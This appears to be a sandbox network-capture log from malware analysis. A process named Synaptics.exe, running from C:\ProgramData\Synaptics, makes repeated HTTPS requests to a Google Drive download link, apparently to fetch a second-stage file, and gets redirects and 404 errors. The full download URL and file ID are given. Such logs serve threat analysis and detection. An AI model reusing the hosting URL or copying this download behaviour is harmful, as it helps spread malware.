                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    3192.168.2.449741142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:02 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:02 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-tkIMf50hkrrrKg-J0f_shg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    4192.168.2.449742142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:02 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:02 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:02 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-BxCVn75FLsNMv7RDi6w75w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    5192.168.2.449743142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:02 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2024-12-30 10:51:02 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC6gqH_5P2dg1lzu6zYdU7_i8IFefIi5c2G5YDybH0WHYRNB4dJssRO7RiBEbGr-PG2y
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:02 GMT
                                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Lu71e4tdMJWXdd3e7yhq_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Set-Cookie: NID=520=KxSTD3Psbm-1FeyxlGzxUd69mJk2UyOFs6ZKOzqzvzhYXYgmp8Hn0rQU_vERd0o40vybDS0HuQNK9CRDdl-U5zri2WP2lR6Z37R4U69VsSoul7LnJrISRFJjNZKKLvjgg2WiLhAwKkkmajzOwbKvcEdMsj-1k0uMHX2f4nb5HgDGLyZmiPuGt70; expires=Tue, 01-Jul-2025 10:51:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:02 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 51 38 31 77 76 51 57 34 71 42 72 4f 76 38 4b 75 4b 78 70 58 53 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="Q81wvQW4qBrOv8KuKxpXSg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                                    2024-12-30 10:51:02 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    6192.168.2.449744142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:02 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2024-12-30 10:51:02 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4zmnUC77fN-icLI1Lryc1bnELifeoUlIOFp-grJ55gwbn0GAE95VgzI8NxTPuP9Q-F
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:02 GMT
                                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-1xg04g2Tk33xh3meyteroA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Set-Cookie: NID=520=dbP6m55jOXmeVvqf-7qrAR5nN00yk5-K2vW_Lpg8QyEEmyYAEb7WZbn2-VL6F7gw223sN9c-SdEQElGxRoejvcg5joy6HyynSuxtgMaGou9ZayiFWm5NmnXs-YzZKaWL928ckLLAGkuaTJNA-zjQjYOyBK5qxNRt_7QjX5pDLyjaoYfpZWA-5Aae; expires=Tue, 01-Jul-2025 10:51:02 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:02 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4d 44 32 42 68 35 43 32 6a 47 33 48 70 53 37 7a 45 39 77 4b 57 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="MD2Bh5C2jG3HpS7zE9wKWg">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                                    2024-12-30 10:51:02 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    7192.168.2.449747142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:03 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:03 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-IVaIMU4vo24IOzZSyfb03A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    8192.168.2.449748142.250.185.2064435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:03 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    2024-12-30 10:51:03 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:03 GMT
                                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-7dTbHzJ0Mab8qg1InniTFg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Server: ESF
                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Connection: close


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    9192.168.2.449749142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:03 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2024-12-30 10:51:03 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC4Jxj33CMvYgY6WxJPNRmTbrlQkYjHn65iN8Te2UNTUOInC9jezsvQDNhvCuNVT5iD6
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:03 GMT
                                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-5F4VaxH1tFbqw9Bc46T6yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Set-Cookie: NID=520=lqGyQnCJXWjDSGUEWiIajQ0XjZxRCPhH84YYK9o2cwWZrWEcNkJK4AyOu_hyvE_rzZg-Yt5R8VIa34x1cHctiOjNuRSZvFbJhVR-ErtXB6BV_AsLOBbx7sJzJvxJRa4RXEbZ_fgwAaojQkMsV8sy7Hi_1vcWB1jaTvIf58DtEOjoVgMaOlNwSag; expires=Tue, 01-Jul-2025 10:51:03 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
                                                                                                                                                                                    2024-12-30 10:51:03 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 73 51 41 34 49 55 41 71 6a 55 76 34 45 53 69 52 50 75 38 4e 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WsQA4IUAqjUv4ESiRPu8NQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                                                                                    2024-12-30 10:51:03 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                                    Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                    10192.168.2.449750142.250.186.334435016C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                    2024-12-30 10:51:03 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                    2024-12-30 10:51:03 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                                                                                    X-GUploader-UploadID: AFiumC7WPcdiOrjc20GeDpPmAtGUPAJIxIg03RwQDnxvaaxt5DpFDEFCYPrQcuxC332mRBq7
                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                                    Date: Mon, 30 Dec 2024 10:51:03 GMT
                                                                                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-odeDIZaLeTm6oMc0cD3Lyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                                    Set-Cookie: NID=520=Z_jVsUpvqc1kLrTOBWVlKLGMs6naSr4ldH_ZaJJOH6WRjIjCDFJ6Sn4iDskWM2-eLf2xAq77jgyx7Pr66Js2w15kjEkMlZg8oJxsLKFgXJGF3LVbTivYpsZkP5dFz8xlvnmzHaXhYBh5bNiTBxNqq3k2AlxYptODFuZAOVGhdBLoaqaN01D9L4mj; expires=Tue, 01-Jul-2025 10:51:03 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                                    Connection: close
